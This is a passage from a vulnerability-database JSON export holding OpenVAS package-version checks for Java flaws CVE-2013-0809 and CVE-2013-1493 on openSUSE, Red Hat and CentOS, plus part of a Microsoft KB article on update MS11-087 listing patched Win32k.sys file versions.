See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850435\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:41 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0438-1\");\n script_name(\"openSUSE: Security Advisory for java-1_6_0-openjdk (openSUSE-SU-2013:0438-1)\");\n\n script_tag(name:\"affected\", value:\"java-1_6_0-openjdk on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"java-1_6_0-openjdk aka IcedTea was updated to 1.12.4\n\n - S8007014, CVE-2013-0809: Improve image handling\n\n - S8007675, CVE-2013-1493: Improve color conversion\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_6_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debuginfo\", rpm:\"java-1_6_0-openjdk-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debugsource\", rpm:\"java-1_6_0-openjdk-debugsource~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo-debuginfo\", rpm:\"java-1_6_0-openjdk-demo-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel-debuginfo\", rpm:\"java-1_6_0-openjdk-devel-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00017.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870956\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:18:44 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0603-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. 
A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", 
rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0602 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0602 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019624.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881655\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:36 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0602\");\n script_name(\"CentOS Update for java CESA-2013:0602 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. 
A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", 
rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:43:11", "description": "<html><body><p>Resolves a vulnerability in Microsoft Windows that could allow remote code execution.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-087. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201112.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201112.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-087\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-087</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" 
target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\">A Fix it solution is available to enable the workaround for CVE-2011-3402.<br/><br/>The Fix it solution that is described in this section is not intended to be a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround option for some scenarios. <br/><br/>For more information about this workaround, visit the following Microsoft Security Advisory webpage: <br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-087\" id=\"kb-link-9\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-087</a></div> The bulletin provides more information about the issue and includes the following: <ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround</li><li>Mitigating factors</li><li>Workarounds</li><li>Frequently asked questions</li></ul>Specifically, to see this information, expand the <strong class=\"uiterm\">Workarounds</strong> section that is related to CVE-2011-3402.<br/><br/>To enable or disable this Fix it solution, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <br/><br/><strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading. 
Click <br/><br/><strong class=\"uiterm\">Run</strong> in the <strong class=\"uiterm\"> File Download</strong> dialog box, and then follow the steps in the Fix it wizard.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9788941\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9788942\" text=\"Download\"></div></span></td></tr></table></div><span class=\"text-base\">Notes</span><ul class=\"sbody-free_list\"><li>These wizards may be in English only. However, the automatic fixes also work for other language versions of Windows.</li><li>If you are not on the computer that has the problem, you can save the automatic fix to a flash drive or to a CD, and then you can run it on the computer that has the problem. </li></ul><h3 class=\"sbody-h3\">Known issues with this workaround</h3><ul class=\"sbody-free_list\"><li>Applications that have functionality that relies on the T2embed.dll file, such as applications that generate PDF files, may not work as expected. For example, Microsoft Office software will be unable to generate PDF files.</li><li>After you apply this workaround on a system that is running Windows XP or Windows Server 2003, you may be reoffered security updates 982132 and 972270. You will be unable to install these reoffered updates. The reoffering is a detection logic issue. Users who have previously applied both security updates successfully can ignore the reoffer. </li><li>Microsoft Office 2003 software that has the Microsoft Office Compatibility Pack installed may not open Microsoft Office PowerPoint 2007 (.pptx) files. 
Instead, you receive the following message: <div class=\"indent\"><div class=\"message\">This file was created by a newer version of Microsoft PowerPoint. Do you want to download a compatibility pack so that you can work with this file?</div></div> You receive this message even though the Microsoft Office Compatibility Pack is already installed.</li></ul></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"> <br/>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/> <br/><h3 class=\"sbody-h3\">Windows XP and Windows Server 2003 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (SP<strong class=\"sbody-strong\">n</strong>) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. 
QFE service branches contain hotfixes in addition to widely released fixes.</li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.1.2600.6178</td><td class=\"sbody-td\">1,859,584</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.1.2600.6178</td><td class=\"sbody-td\">1,868,544</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:29</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">4,573,184</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:35</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">4,591,616</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:30</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">1,861,632</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">14:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">1,872,384</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">14:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th 
class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">5,602,816</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:33</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">5.2.3790.4938</td><td class=\"sbody-td\">5,621,248</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">08:30</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span 
class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests\" href=\"#manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">2,043,904</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">2,052,096</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:35</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr 
class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">2,764,800</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:57</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">2,767,360</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:36</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.0.6002.18544</td><td class=\"sbody-td\">6,648,832</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td 